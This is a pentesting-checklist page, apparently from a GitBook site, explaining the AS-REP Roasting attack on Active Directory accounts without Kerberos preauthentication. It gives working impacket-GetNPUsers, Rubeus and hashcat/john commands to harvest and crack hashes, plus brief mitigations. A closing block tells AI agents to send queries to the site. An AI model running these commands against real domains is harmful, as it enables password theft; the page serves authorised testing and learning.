# AS-REP Roasting Attack

### Overview

**AS-REP Roasting** is a Kerberos-based attack in **Active Directory** that targets **user accounts with Kerberos preauthentication disabled.** Normally, Kerberos requires users to prove knowledge of their password *before* the Key Distribution Center (KDC) issues authentication data. If **preauthentication is disabled**, the KDC will respond to an authentication request with an **AS-REP** that is **encrypted using the user’s password-derived key**.

An attacker can:

1. Request AS-REP responses for vulnerable users
2. Extract the encrypted data
3. **Offline crack** it to recover the user’s password (or NT hash)

### Prerequisites

1. The target account must have "**Do not require Kerberos preauthentication**" enabled in AD.
2. Must know (or guess) a valid domain username.
3. Weak or crackable password.

### Steps

1. Check which users have **preauthentication** disabled.

   ```bash
   # Give the users have Do not require Kerberos preauthentication
   impacket-GetNPUsers toffee.bth/ -dc-ip 10.10.10.100 -usersfile users.txt -no-pass

   # Check if user1 does not require preauthentication.
   impacket-GetNPUsers toffee.bth/user1 -dc-ip 10.10.10.100 -no-pass
   ```
2. Get back a TGT with a user which has **preauthentication** disabled.

   ```bash
   # Linux
   impacket-GetNPUsers toffee.bth/bob -dc-ip 10.10.10.100 -request -no-pass

   # Windows
   .\Rubeus.exe asreproast /nowrap
   ```
3. Crack these hashes.

   ```bash
   hashcat -m 18200 asrep.txt wordlist.txt
   john asrep.txt wordlist.txt
   ```

### Mitigations

1. Enable Kerberos Preauthentication.
2. Use Strong Passwords.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/initial-attack-vectors/as-rep-roasting-attack.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.